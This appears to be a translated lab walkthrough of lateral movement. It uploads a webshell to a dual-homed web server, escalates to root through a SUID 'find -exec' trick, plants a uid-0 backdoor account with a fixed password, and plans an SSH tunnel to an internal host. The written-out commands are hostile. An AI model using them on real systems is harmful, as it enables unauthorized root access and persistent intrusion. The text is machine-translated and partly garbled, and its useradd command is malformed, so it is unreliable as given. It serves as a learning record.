Isolate the internal network target: 192.168.179.200
This target cannot be accessed directly, and the
web machine must be accessed through the web server (dual network card): external network IP: 192.168.43.100; internal network IP: 192.168.179.100
First visit the external network IP and upload the webshell Get the daemon permission and
upload successfully:
Bingscorpion connection:
Now we need to elevate privileges, get root privileges, and use Linux SUID to elevate privileges here. The so-called SUID attribute actually represents the temporary super user authority.
Use the command find / -perm -u=s -type f 2>/dev/null to see which programs have the SUID attribute (because it is a full search, the speed will be a bit slow):
Find a program that can escalate privileges through suid:
Nmap
Vim
find
Bash
More
Less
Nano
cp
Found that find can be used to
enter the /tmp directory, and then create a new file
touch abcd
find abcd -exec whoami;
currently has root privileges temporarily:
For convenience, we need to create an account. It is best that this account has root privileges:
set the uid to 0, and the created account is the root account: useradd -p openssl passwd -1 -salt 'masters' 123456-u 0 -o -g root -G root -s /bin/bash -d /usr/bin/masters masters
successfully created an account:
Now that we have obtained the root privileges of the web server with dual network cards, we can access the controlled target:
The next step is to establish an SSH tunnel, which is actually port forwarding through SSH. VPS is used here. The listening port is opened on the target host, and the traffic is forwarded to the VPS port through port forwarding. The specifics have not yet been implemented, and they have been updated in the near future, and the criticisms will be changed as a learning record.